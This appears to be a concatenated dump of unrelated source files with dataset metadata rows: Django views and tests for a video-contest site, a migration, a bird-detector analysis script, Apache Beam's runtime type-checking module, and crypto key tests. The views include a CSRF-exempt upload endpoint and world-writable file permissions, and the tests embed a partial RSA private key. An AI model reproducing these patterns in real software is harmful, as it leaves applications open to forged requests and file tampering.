# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 <= i <= m, 1 <= j <= m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
if __name__ == "__main__":
main()
|
apache-2.0
| 297,183,618,561,606,400
| 32.487805
| 242
| 0.546769
| false
| 2.052536
| false
| false
| false
|
NicolasBonet/cloud
|
videosapp/views.py
|
1
|
8807
|
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render_to_response, render
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.forms import UserCreationForm
from videosapp.forms import *
from videosapp.models import Concurso
from videosapp.models import Video
from django.core.paginator import Paginator, InvalidPage, EmptyPage
import dateutil.parser
import datetime
import os.path
from django.core.mail import send_mail
from django.conf import settings
from moviepy.editor import *
def index(request):
return render(request, "index.html")
def post_registrarse(request):
if request.user.is_authenticated():
raise Exception("Ya estas registrado");
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
if (request.POST['password2'] != request.POST['password1']):
raise Exception("Las contrasenas no coinciden");
new_user = form.save()
new_user.email = request.POST['email']
new_user.first_name = request.POST['first_name']
new_user.last_name = request.POST['last_name']
new_user.save()
return render_to_response("registro.html", dict(mensajeExito="Usuario creado!"), RequestContext(request))
else:
return render_to_response("registro.html", dict(mensajeError=form.errors), RequestContext(request))
else:
form = UserCreationForm()
return render(request, "registro.html", {
'form': form,
})
def post_concurso(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
vahora = str(datetime.datetime.now())
vahora = vahora.split(' ')
if request.method == 'POST':
form = ConcursoCreationForm(request.POST, request.FILES)
# If data is valid, proceeds to create a new post and redirect the user
if form.is_valid():
if (Concurso.objects.filter(url = request.POST['url'].lower()).count() > 0):
raise Exception("Esa URL ya esta siendo usada por otro concurso");
new_concurso = form.save()
new_concurso.user = request.user
new_concurso.url = new_concurso.url.lower()
new_concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
new_concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
new_concurso.url = request.POST['url'].lower()
new_concurso.save()
return HttpResponseRedirect("/perfil")
else:
return render_to_response("crear_concurso.html", dict(
mensajeError=form.errors, ahora = vahora[0]), RequestContext(request))
else:
form = ConcursoCreationForm()
return render(request, "crear_concurso.html", {
'form': form,
'ahora': vahora[0],
})
def editar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
    if (request.user != concurso.user):
raise Exception("No estas autorizado");
if request.method == 'POST':
urlNueva = request.POST['url'].lower()
if (Concurso.objects.filter(url = urlNueva).exclude(id = concurso.id).count() > 0):
return render_to_response("editar_concurso.html",
dict(mensajeError = "Url " + urlNueva + " en uso!",
concurso = concurso, ahora = str(concurso.fecha_inicio), fin = str(concurso.fecha_fin)),
RequestContext(request))
concurso.nombre = request.POST['nombre']
concurso.url = urlNueva
concurso.descripcion = request.POST['descripcion']
concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
concurso.save()
return HttpResponseRedirect("/perfil")
ahora = str(concurso.fecha_inicio)
fin = str(concurso.fecha_fin)
return render(request, "editar_concurso.html", {
'ahora': ahora,
'fin': fin,
'concurso': concurso,
})
def borrar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
    if (request.user != concurso.user):
raise Exception("No estas autorizado");
concurso.delete()
return HttpResponseRedirect("/perfil")
def detalle_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
    if (request.user != concurso.user):
raise Exception("No estas autorizado");
videos = Video.objects.all().filter(concurso=concurso)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("videosadmin.html", dict(videos=videos, user=request.user))
def perfil(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
#concursos = Concurso.objects.get(user=request.user)
concursos = Concurso.objects.all().filter(user=request.user).order_by('-fecha_inicio')
paginator = Paginator(concursos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
concursos = paginator.page(page)
except (InvalidPage, EmptyPage):
concursos = paginator.page(paginator.num_pages)
return render_to_response("list.html", dict(concursos=concursos, user=request.user), context_instance=RequestContext(request))
def concurso(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
videos = Video.objects.all().filter(concurso=c, convertido=True)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("concurso.html", dict(videos=videos, user=request.user, concurso=c, page=page), RequestContext(request))
@csrf_exempt
def subir_video(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
if request.method == 'POST':
form = UploadForm(request.POST, request.FILES)
if form.is_valid():
video = form.save()
video.convertido = False
video.correo_usuario = request.POST['correo_usuario']
video.nombre_usuario = request.POST['nombre_usuario']
video.apellidos_usuario = request.POST['apellidos_usuario']
video.concurso = Concurso.objects.get(url=urlConcurso)
video.save()
return render_to_response("subir_video.html", dict(concurso=c, mensajeExito="Hemos recibido tu video y los estamos procesado para que sea publicado. Tan pronto el video quede publicado en la pagina del concurso te notificaremos por email"), RequestContext(request))
else:
return render_to_response("subir_video.html", dict(concurso=c, mensajeError=form.errors), RequestContext(request))
else:
form = UploadForm()
return render_to_response("subir_video.html", dict(concurso=c), RequestContext(request))
def convert_video(request):
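    # moviepy writes its temporary audio track to temp-audio.m4a (the
    # temp_audiofile argument below); using its presence as a crude lock keeps
    # more than one conversion from running at once.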
if (os.path.isfile("temp-audio.m4a")):
return None
video = Video.objects.filter(convertido=False).order_by('fecha_inicio')[:1].get()
videopath = settings.BASE_DIR + settings.STATIC_URL + "videos/" + os.path.basename(video.video.name)
os.chmod(videopath, 0777)
clip = VideoFileClip(videopath)
send_mail('El video convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', 'soportetecnico233@gmail.com', ['nibogo2@gmail.com'])
clip.write_videofile(settings.BASE_DIR + settings.STATIC_URL + "convertidos/" + str(video.id) + ".mp4",
codec='libx264',
audio_codec='aac',
temp_audiofile='temp-audio.m4a',
remove_temp=True
)
send_mail('El video ' + video.nombre + ' ha sido convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', 'soportetecnico233@gmail.com', [video.correo_usuario])
video.convertido = True
video.save()
|
agpl-3.0
| 8,715,289,717,513,734,000
| 38.316964
| 277
| 0.660384
| false
| 3.437549
| false
| false
| false
|
pythonindia/wye
|
tests/functional/test_edit_profile.py
|
1
|
6792
|
import pytest
from .. import base
from .. import factories as f
from .. utils import create_user_verify_login
pytestmark = pytest.mark.django_db
def create_user_type(slug='tutor'):
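    # Test helper: build the UserType fixture (e.g. 'tutor' or 'poc') used to
    # tag user profiles in these flows.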
tutor_type = f.create_usertype(slug=slug, display_name=slug)
return tutor_type
def test_signup_college_poc_flow(base_url, browser, outbox):
create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
    # mobile number check
url = base_url + '/profile/' + user.username + '/edit/'
browser.visit(url)
browser.fill('mobile', '')
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Use first name and last name
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# occupation is required
browser.fill('first_name', 'First Name')
browser.fill('last_name', 'Last Name')
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Sucess case
browser = base.profile_poc_create(
browser, url, None,
section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
def test_signup_tutor_flow(base_url, browser, outbox):
tutor_type = create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(tutor_type)
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
    # mobile number check
url = base_url + '/profile/' + user.username + '/edit'
browser.visit(url)
browser.fill('mobile', '')
browser.select('usertype', tutor_type.id)
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# location check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# Github check
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('Github or LinkedIn field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present(
'Interested workshop level field is mandatory')
browser.visit(url)
browser.fill('mobile', '1234567890')
browser.select('interested_sections', section1.id)
browser.select('interested_states', state1.id)
browser.select('interested_level', 1)
browser.select('location', location1.id)
browser.fill('github', 'https://github.com')
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
browser = base.profile_tutor_create(
browser, url, tutor_type.id, section1.id, state1.id, location1.id)
assert browser.is_text_present('Deactive Account')
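    # Seed an organisation and several workshops presented by this user so the
    # profile page visited below has activity to render.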
org = f.create_organisation(location=location1)
org.user.add(user)
# section2 = f.create_workshop_section(name='section2')
w1 = f.create_workshop(requester=org, workshop_section=section1)
w1.presenter.add(user)
w2 = f.create_workshop(requester=org, workshop_section=section1)
w2.presenter.add(user)
w3 = f.create_workshop(requester=org, workshop_section=section1)
w3.presenter.add(user)
w4 = f.create_workshop(requester=org, workshop_section=section1)
w4.presenter.add(user)
w5 = f.create_workshop(requester=org, workshop_section=section1)
w5.presenter.add(user)
url = base_url + '/profile/' + user.username + '/'
browser.visit(url)
# assert browser.is_text_present('Deactive Account')
|
mit
| -2,212,431,880,996,849,200
| 36.944134
| 75
| 0.686543
| false
| 3.38247
| false
| false
| false
|
shawnhermans/cyborg-identity-manager
|
cyborg_identity/migrations/0003_auto_20150628_2144.py
|
1
|
1089
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cyborg_identity', '0002_iscontactemailaddress_iscontactphonenumber_phonenumber'),
]
operations = [
migrations.RemoveField(
model_name='emailaddress',
name='node_ptr',
),
migrations.RemoveField(
model_name='iscontactemailaddress',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='iscontactphonenumber',
name='relationship_ptr',
),
migrations.RemoveField(
model_name='phonenumber',
name='node_ptr',
),
migrations.DeleteModel(
name='EmailAddress',
),
migrations.DeleteModel(
name='IsContactEmailAddress',
),
migrations.DeleteModel(
name='IsContactPhoneNumber',
),
migrations.DeleteModel(
name='PhoneNumber',
),
]
|
mit
| -3,159,675,205,751,116,000
| 24.928571
| 91
| 0.55831
| false
| 4.556485
| false
| false
| false
|
HaroldMills/Vesper
|
scripts/detector_eval/manual/analyze_classification_edits.py
|
1
|
5201
|
"""
Script that analyzes the classification edits of an archive.
The analysis focuses on changes user "dleick" made to classifications
created by user "cvoss", in order to inform decisions about how to most
efficiently direct classification effort.
"""
from collections import defaultdict
import sqlite3
# Set up Django. This must happen before any use of Django, including
# ORM class imports.
import vesper.util.django_utils as django_utils
django_utils.set_up_django()
from vesper.django.app.models import AnnotationInfo, Processor, User
ANNOTATION_NAME = 'Classification'
DETECTOR_NAMES = frozenset([
'BirdVoxDetect 0.1.a0 AT 05',
'MPG Ranch Thrush Detector 0.0 40',
'MPG Ranch Tseep Detector 0.0 40'
])
DATABASE_FILE_NAME = 'Archive Database.sqlite'
QUERY = '''
select e.clip_id, e.action, e.value, e.creating_user_id, e.creation_time
from vesper_string_annotation_edit as e
join vesper_clip as c on e.clip_id = c.id
where c.creating_processor_id = ?
and e.info_id = ?
and e.creation_time >= ?;
'''
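# Each QUERY row is (clip_id, action, value, creating_user_id, creation_time);
# action 'S' marks a classification being set and 'D' a deletion (see
# get_count_key below).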
START_DATE = '2019-04-01'
def main():
annotation_info = AnnotationInfo.objects.get(name=ANNOTATION_NAME)
users = get_users()
for processor in Processor.objects.all():
if processor.name in DETECTOR_NAMES:
print('{}:'.format(processor.name))
edits = get_classification_edits(processor.id, annotation_info.id)
analyze_edits(edits, users)
def get_users():
return dict((u.id, u.username) for u in User.objects.all())
def get_classification_edits(detector_id, annotation_info_id):
connection = sqlite3.connect(DATABASE_FILE_NAME)
values = (detector_id, annotation_info_id, START_DATE)
with connection:
rows = connection.execute(QUERY, values)
edits = defaultdict(list)
for clip_id, action, value, user_id, time in rows:
edits[clip_id].append((action, value, user_id, time))
connection.close()
return edits
def analyze_edits(edit_lists, user_names):
history_counts = count_edit_histories(edit_lists, user_names)
change_counts = count_changes(history_counts)
# print(' history counts:')
# histories = sorted(history_counts.keys())
# for history in histories:
# print(' {} {}'.format(history, history_counts[history]))
print(" Debbie's classification change counts:")
changes = sorted(change_counts.keys())
for old, new in changes:
count = change_counts[(old, new)]
print(' {} -> {} {}'.format(old, new, count))
num_changes = sum(change_counts.values())
total_num_clips = sum(history_counts.values())
changed_percent = 100 * num_changes / total_num_clips
print((
" Debbie changed Carrie's classifications for {} of {} clips, "
'or {:.1f} percent.').format(
num_changes, total_num_clips, changed_percent))
def count_edit_histories(edit_lists, user_names):
counts = defaultdict(int)
clip_ids = sorted(edit_lists.keys())
for clip_id in clip_ids:
edits = edit_lists[clip_id]
histories = tuple([get_count_key(e, user_names) for e in edits])
counts[histories] += 1
return counts
def get_count_key(edit, user_names):
action, classification, user_id, _ = edit
if user_id is None:
user_name = 'transfer'
else:
user_name = user_names[user_id]
if action == 'S':
return (user_name, classification)
elif action == 'D':
return (user_name, 'Unclassified')
else:
raise ValueError('Unrecognized edit action "{}".'.format(action))
def count_changes(history_counts):
change_counts = defaultdict(int)
for edits, count in history_counts.items():
if edits[-1][0] == 'dleick':
# Debbie made final edit in this history
debbie_classification = edits[-1][1]
i = find_final_carrie_edit(edits)
if i == -1:
# history includes no Carrie edits
accumulate_change_count(
change_counts, 'Unclassified', debbie_classification,
count)
else:
# history includes at least one Carrie edit
carrie_classification = edits[i][1]
accumulate_change_count(
change_counts, carrie_classification,
debbie_classification, count)
return change_counts
def find_final_carrie_edit(edits):
for i, (name, _) in enumerate(reversed(edits)):
if name == 'cvoss':
return len(edits) - i - 1
return -1
def accumulate_change_count(change_counts, old, new, count):
if new != old and not (old == 'Unclassified' and new == 'Noise'):
change_counts[(old, new)] += count
if __name__ == '__main__':
main()
|
mit
| -7,949,347,712,655,548,000
| 26.962366
| 78
| 0.585849
| false
| 3.824265
| false
| false
| false
|
aaltay/beam
|
sdks/python/apache_beam/typehints/typecheck.py
|
1
|
12441
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Runtime type checking support.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
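# Note: these wrappers are typically installed by the visitors at the bottom
# of this module when a pipeline runs with runtime type checking enabled
# (e.g. the runtime_type_check pipeline option); user code does not normally
# instantiate them directly.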
from __future__ import absolute_import
import collections
import inspect
import types
from future.utils import raise_with_traceback
from past.builtins import unicode
from apache_beam import pipeline
from apache_beam.pvalue import TaggedOutput
from apache_beam.transforms import core
from apache_beam.transforms.core import DoFn
from apache_beam.transforms.window import WindowedValue
from apache_beam.typehints.decorators import GeneratorWrapper
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import _check_instance_type
from apache_beam.typehints.decorators import getcallargs_forhints
from apache_beam.typehints.typehints import CompositeTypeHintError
from apache_beam.typehints.typehints import SimpleTypeHintError
from apache_beam.typehints.typehints import check_constraint
class AbstractDoFnWrapper(DoFn):
"""An abstract class to create wrapper around DoFn"""
def __init__(self, dofn):
super(AbstractDoFnWrapper, self).__init__()
self.dofn = dofn
def _inspect_start_bundle(self):
return self.dofn.get_function_arguments('start_bundle')
def _inspect_process(self):
return self.dofn.get_function_arguments('process')
def _inspect_finish_bundle(self):
return self.dofn.get_function_arguments('finish_bundle')
def wrapper(self, method, args, kwargs):
return method(*args, **kwargs)
def setup(self):
return self.dofn.setup()
def start_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.start_bundle, args, kwargs)
def process(self, *args, **kwargs):
return self.wrapper(self.dofn.process, args, kwargs)
def finish_bundle(self, *args, **kwargs):
return self.wrapper(self.dofn.finish_bundle, args, kwargs)
def teardown(self):
return self.dofn.teardown()
class OutputCheckWrapperDoFn(AbstractDoFnWrapper):
"""A DoFn that verifies against common errors in the output type."""
def __init__(self, dofn, full_label):
super(OutputCheckWrapperDoFn, self).__init__(dofn)
self.full_label = full_label
def wrapper(self, method, args, kwargs):
try:
result = method(*args, **kwargs)
except TypeCheckError as e:
# TODO(BEAM-10710): Remove the 'ParDo' prefix for the label name
error_msg = (
'Runtime type violation detected within ParDo(%s): '
'%s' % (self.full_label, e))
raise_with_traceback(TypeCheckError(error_msg))
else:
return self._check_type(result)
@staticmethod
def _check_type(output):
if output is None:
return output
elif isinstance(output, (dict, bytes, str, unicode)):
object_type = type(output).__name__
raise TypeCheckError(
'Returning a %s from a ParDo or FlatMap is '
'discouraged. Please use list("%s") if you really '
'want this behavior.' % (object_type, output))
elif not isinstance(output, collections.Iterable):
raise TypeCheckError(
'FlatMap and ParDo must return an '
'iterable. %s was returned instead.' % type(output))
return output
class TypeCheckWrapperDoFn(AbstractDoFnWrapper):
"""A wrapper around a DoFn which performs type-checking of input and output.
"""
def __init__(self, dofn, type_hints, label=None):
super(TypeCheckWrapperDoFn, self).__init__(dofn)
self._process_fn = self.dofn._process_argspec_fn()
if type_hints.input_types:
input_args, input_kwargs = type_hints.input_types
self._input_hints = getcallargs_forhints(
self._process_fn, *input_args, **input_kwargs)
else:
self._input_hints = None
# TODO(robertwb): Multi-output.
self._output_type_hint = type_hints.simple_output_type(label)
def wrapper(self, method, args, kwargs):
result = method(*args, **kwargs)
return self._type_check_result(result)
def process(self, *args, **kwargs):
if self._input_hints:
actual_inputs = inspect.getcallargs(self._process_fn, *args, **kwargs) # pylint: disable=deprecated-method
for var, hint in self._input_hints.items():
if hint is actual_inputs[var]:
# self parameter
continue
_check_instance_type(hint, actual_inputs[var], var, True)
return self._type_check_result(self.dofn.process(*args, **kwargs))
def _type_check_result(self, transform_results):
if self._output_type_hint is None or transform_results is None:
return transform_results
def type_check_output(o):
# TODO(robertwb): Multi-output.
x = o.value if isinstance(o, (TaggedOutput, WindowedValue)) else o
self.type_check(self._output_type_hint, x, is_input=False)
# If the return type is a generator, then we will need to interleave our
# type-checking with its normal iteration so we don't deplete the
# generator initially just by type-checking its yielded contents.
if isinstance(transform_results, types.GeneratorType):
return GeneratorWrapper(transform_results, type_check_output)
for o in transform_results:
type_check_output(o)
return transform_results
@staticmethod
def type_check(type_constraint, datum, is_input):
"""Typecheck a PTransform related datum according to a type constraint.
This function is used to optionally type-check either an input or an output
to a PTransform.
Args:
type_constraint: An instance of a typehints.TypeContraint, one of the
white-listed builtin Python types, or a custom user class.
datum: An instance of a Python object.
is_input: True if 'datum' is an input to a PTransform's DoFn. False
otherwise.
Raises:
TypeError: If 'datum' fails to type-check according to 'type_constraint'.
"""
datum_type = 'input' if is_input else 'output'
try:
check_constraint(type_constraint, datum)
except CompositeTypeHintError as e:
raise_with_traceback(TypeCheckError(e.args[0]))
except SimpleTypeHintError:
error_msg = (
"According to type-hint expected %s should be of type %s. "
"Instead, received '%s', an instance of type %s." %
(datum_type, type_constraint, datum, type(datum)))
raise_with_traceback(TypeCheckError(error_msg))
class TypeCheckCombineFn(core.CombineFn):
"""A wrapper around a CombineFn performing type-checking of input and output.
"""
def __init__(self, combinefn, type_hints, label=None):
self._combinefn = combinefn
self._input_type_hint = type_hints.input_types
self._output_type_hint = type_hints.simple_output_type(label)
self._label = label
def setup(self, *args, **kwargs):
self._combinefn.setup(*args, **kwargs)
def create_accumulator(self, *args, **kwargs):
return self._combinefn.create_accumulator(*args, **kwargs)
def add_input(self, accumulator, element, *args, **kwargs):
if self._input_type_hint:
try:
_check_instance_type(
self._input_type_hint[0][0].tuple_types[1],
element,
'element',
True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return self._combinefn.add_input(accumulator, element, *args, **kwargs)
def merge_accumulators(self, accumulators, *args, **kwargs):
return self._combinefn.merge_accumulators(accumulators, *args, **kwargs)
def compact(self, accumulator, *args, **kwargs):
return self._combinefn.compact(accumulator, *args, **kwargs)
def extract_output(self, accumulator, *args, **kwargs):
result = self._combinefn.extract_output(accumulator, *args, **kwargs)
if self._output_type_hint:
try:
_check_instance_type(
self._output_type_hint.tuple_types[1], result, None, True)
except TypeCheckError as e:
error_msg = (
'Runtime type violation detected within %s: '
'%s' % (self._label, e))
raise_with_traceback(TypeCheckError(error_msg))
return result
def teardown(self, *args, **kwargs):
self._combinefn.teardown(*args, **kwargs)
class TypeCheckVisitor(pipeline.PipelineVisitor):
_in_combine = False
def enter_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = True
self._wrapped_fn = applied_transform.transform.fn = TypeCheckCombineFn(
applied_transform.transform.fn,
applied_transform.transform.get_type_hints(),
applied_transform.full_label)
def leave_composite_transform(self, applied_transform):
if isinstance(applied_transform.transform, core.CombinePerKey):
self._in_combine = False
def visit_transform(self, applied_transform):
transform = applied_transform.transform
if isinstance(transform, core.ParDo):
if self._in_combine:
if isinstance(transform.fn, core.CombineValuesDoFn):
transform.fn.combinefn = self._wrapped_fn
else:
transform.fn = transform.dofn = OutputCheckWrapperDoFn(
TypeCheckWrapperDoFn(
transform.fn,
transform.get_type_hints(),
applied_transform.full_label),
applied_transform.full_label)
class PerformanceTypeCheckVisitor(pipeline.PipelineVisitor):
def visit_transform(self, applied_transform):
transform = applied_transform.transform
full_label = applied_transform.full_label
# Store output type hints in current transform
output_type_hints = self.get_output_type_hints(transform)
if output_type_hints:
transform._add_type_constraint_from_consumer(
full_label, output_type_hints)
# Store input type hints in producer transform
input_type_hints = self.get_input_type_hints(transform)
if input_type_hints and len(applied_transform.inputs):
producer = applied_transform.inputs[0].producer
if producer:
producer.transform._add_type_constraint_from_consumer(
full_label, input_type_hints)
def get_input_type_hints(self, transform):
type_hints = transform.get_type_hints()
input_types = None
if type_hints.input_types:
normal_hints, kwarg_hints = type_hints.input_types
if kwarg_hints:
input_types = kwarg_hints
if normal_hints:
input_types = normal_hints
parameter_name = 'Unknown Parameter'
if hasattr(transform, 'fn'):
try:
argspec = inspect.getfullargspec(transform.fn._process_argspec_fn())
except TypeError:
# An unsupported callable was passed to getfullargspec
pass
else:
if len(argspec.args):
arg_index = 0
if argspec.args[0] == 'self' and len(argspec.args) > 1:
arg_index = 1
parameter_name = argspec.args[arg_index]
if isinstance(input_types, dict):
input_types = (input_types[argspec.args[arg_index]], )
if input_types and len(input_types):
input_types = input_types[0]
return parameter_name, input_types
def get_output_type_hints(self, transform):
type_hints = transform.get_type_hints()
output_types = None
if type_hints.output_types:
normal_hints, kwarg_hints = type_hints.output_types
if kwarg_hints:
output_types = kwarg_hints
if normal_hints:
output_types = normal_hints
if output_types and len(output_types):
output_types = output_types[0]
return None, output_types
|
apache-2.0
| -7,856,147,975,945,957,000
| 35.06087
| 113
| 0.685958
| false
| 3.857674
| false
| false
| false
|
vbwagner/ctypescrypto
|
tests/testpkey.py
|
1
|
9134
|
from ctypescrypto.pkey import PKey
from ctypescrypto import pyver
import unittest,re
from base64 import b64decode, b16decode
from subprocess import Popen,PIPE,CalledProcessError
def pem2der(s):
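    # Strip the PEM armor (the -----BEGIN/END----- lines) and base64-decode
    # the body to recover the raw DER bytes.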
start=s.find('-----\n')
finish=s.rfind('\n-----END')
data=s[start+6:finish]
return b64decode(data)
def runopenssl(args,indata):
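    # Shell out to the openssl CLI as an independent oracle for checking
    # PKey output; decode stdout to text on Python 3.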
p=Popen(['openssl']+args,stdin=PIPE,stdout=PIPE,stderr=PIPE)
(out,err)=p.communicate(indata)
if p.returncode:
raise CalledProcessError(p.returncode," ".join(['openssl']+args)+":"+err)
if pyver > 2:
out = out.decode("utf-8")
return out
class TestPKey(unittest.TestCase):
rsa="""-----BEGIN PRIVATE KEY-----
MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAL9CzVZu9bczTmB8
776pPUoPo6WbAfwQqqiGrj91bk2mYE+MNLo4yIQH45IcwGzkyS8+YyQJf8Bux5BC
oZ2nwzXm5+JZkxkN1mtMzit2D7/hHmrZLoSbr0sxXFrD4a35RI4hXnSK9Sk01sXA
Te2OgHzm5nk1sG97G6SFq7CHe3gvAgMBAAECgYAgGV8K7Y5xk7vIt88oyZCOuHc3
mP9JRabOp+PgpJ3BjHXHg/lpc5Q7jHNmF0s4O2GEe0z6RFnbevwlOvmS0xAQ1hpg
5TnVVkiZvcJeQaZqWIlEOaLqA12YdhSyorfB6p3tfQ7ZmQusg3SCsru5kPJV4sm0
I+MuRCQZWSzIqelloQJBAPbtScJI0lXx8sktntZi69cAVvLtz5z1T7bZwFakNkNE
SUCjNc/hEEI6/1LScV8Kx9kgQ0+W8smu+GyUDceyVFECQQDGSeS7cTmojkiPQxPB
